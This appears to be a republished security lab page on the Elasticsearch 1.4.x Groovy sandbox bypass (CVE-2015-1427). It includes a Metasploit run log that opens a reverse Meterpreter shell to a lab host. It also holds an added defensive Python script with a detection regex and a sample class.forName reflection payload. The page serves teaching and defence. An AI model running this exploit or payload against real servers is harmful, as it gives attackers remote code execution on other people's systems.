Lab - ElasticSearch Search Groovy Sandbox Bypass

Source: Internet   Published under: Software lifecycle management   Editor: 程序博客网   Time: 2024/05/02 02:02

Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0

Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.

Install

Please read the official installation page first.

elasticsearch can be started using:

$ bin/elasticsearch

On *nix systems, the command will start the process in the foreground.

Running as a daemon

To run it in the background, add the -d switch to it:

$ bin/elasticsearch -d

PID

The Elasticsearch process can write its PID to a specified file on startup, making it easy to shut down the process later on:

$ bin/elasticsearch -d -p pid
$ kill `cat pid`

Exploit

This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the REST API, which does not require authentication: the search function allows Groovy code execution, and its sandbox can be bypassed using java.lang.Math.class.forName to reference arbitrary classes, which makes it possible to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.

msf exploit(search_groovy_script) > show options

Module options (exploit/multi/elasticsearch/search_groovy_script):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.102    yes       The target address
   RPORT      9200             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the ElasticSearch REST API
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   ElasticSearch 1.4.2

msf exploit(search_groovy_script) > run

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Checking vulnerability...
[*] Discovering TEMP path...
[+] TEMP path on '/tmp'
[*] Discovering remote OS...
[+] Remote OS is 'Linux'
[*] Trying to load metasploit payload...
[*] Sending stage (46112 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.102:59238) at 2016-03-05 08:25:25 +0800
[+] Deleted /tmp/rCrwvV.jar
meterpreter > sysinfo
Computer    : lab
OS          : Linux 4.3.0-kali1-686-pae (i386)
Meterpreter : java/java
meterpreter >
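The description above gives a defender three things to check: the node version (fixed in 1.4.3), whether dynamic Groovy scripting is still enabled, and whether search requests carrying inline scripts with the class.forName reflection path are reaching the unauthenticated REST API. The script below is an added example written for this lab page; it is not code from the page, from Elasticsearch, or from the Metasploit module. It assumes you can feed it the JSON body a node returns for GET / on port 9200, the text of elasticsearch.yml (parsed here as flat key: value lines, no nesting), and request bodies captured in front of the node by a reverse proxy or packet capture. The setting names script.disable_dynamic and script.groovy.sandbox.enabled are the 1.x settings that turn dynamic Groovy off; the request samples are constructed for the example.

```python
"""Defensive checks for the Elasticsearch 1.x Groovy sandbox bypass (CVE-2015-1427).

Added example for this lab page, not the page's or the project's own code.
Three checks:
  1. is_vulnerable_version(): version from the GET / JSON is below 1.4.3.
  2. dynamic_scripting_disabled(): elasticsearch.yml carries a 1.x setting
     that disables dynamic Groovy scripts (mitigation for unpatched nodes).
  3. scan(): classify captured search requests by whether they carry inline
     scripts, and whether those scripts use the class.forName reflection path.
"""
import json
import re

FIXED_VERSION = (1, 4, 3)  # first release that ships with the Groovy sandbox disabled

# The bypass named on the page goes through <class>.class.forName(...); a bare
# Class.forName(...) is caught as well.
REFLECTION_PATTERN = re.compile(r"\.class\s*\.\s*forName\s*\(|\bClass\s*\.\s*forName\s*\(")


def parse_version(version_str):
    """'1.4.2' -> (1, 4, 2); pre-release suffixes such as '1.4.0.Beta1' are ignored."""
    parts = []
    for piece in version_str.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_vulnerable_version(root_response_json):
    """root_response_json: the body a node returns for GET / (contains version.number)."""
    info = json.loads(root_response_json)
    return parse_version(info["version"]["number"]) < FIXED_VERSION


def dynamic_scripting_disabled(yml_text):
    """Assumption: elasticsearch.yml written as flat 'dotted.key: value' lines.
    Returns True if either 1.x setting that turns dynamic Groovy off is present."""
    settings = {}
    for line in yml_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if ":" in line:
            key, value = line.split(":", 1)
            settings[key.strip()] = value.strip().lower()
    return (settings.get("script.disable_dynamic") == "true"
            or settings.get("script.groovy.sandbox.enabled") == "false")


def _walk_scripts(node, found):
    """Collect every inline script string in a query body (any key named 'script')."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "script" and isinstance(value, str):
                found.append(value)
            else:
                _walk_scripts(value, found)
    elif isinstance(node, list):
        for item in node:
            _walk_scripts(item, found)
    return found


def classify_request(path, body):
    """Return 'reflection', 'dynamic-script' or 'clean' for one captured request."""
    if "_search" not in path:
        return "clean"
    try:
        query = json.loads(body)
    except ValueError:
        return "clean"
    scripts = _walk_scripts(query, [])
    if not scripts:
        return "clean"
    if any(REFLECTION_PATTERN.search(s) for s in scripts):
        return "reflection"
    # Any inline script on a pre-1.4.3 node is already a finding: the sandbox
    # is bypassable, so only the reflection check distinguishes severity.
    return "dynamic-script"


def scan(requests):
    """requests: iterable of (method, path, body). Returns [(path, classification)]."""
    return [(path, classify_request(path, body)) for _method, path, body in requests]


# Constructed traffic for this example: (method, path, body).
SAMPLE_REQUESTS = [
    ("POST", "/_search", json.dumps({"query": {"match_all": {}}})),
    ("POST", "/logs/_search", json.dumps({
        "size": 1,
        "script_fields": {"doubled": {"script": "doc['bytes'].value * 2", "lang": "groovy"}},
    })),
    ("POST", "/_search", json.dumps({
        "size": 1,
        "script_fields": {"probe": {"script": "java.lang.Math.class.forName('java.util.Date').newInstance()"}},
    })),
    ("GET", "/_cluster/health", ""),
]

if __name__ == "__main__":
    print("vulnerable version:", is_vulnerable_version('{"version": {"number": "1.4.2"}}'))
    print("dynamic scripting off:", dynamic_scripting_disabled("script.groovy.sandbox.enabled: false\n"))
    for path, verdict in scan(SAMPLE_REQUESTS):
        print(f"{verdict:15s} {path}")
```

On a node that reports 1.4.2 and has neither setting, the only immediate fix short of upgrading is to set script.groovy.sandbox.enabled: false (or script.disable_dynamic: true) and restart; the request scan then tells you whether anyone was already sending inline scripts before that change.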

References

https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch
http://drops.wooyun.org/papers/5107
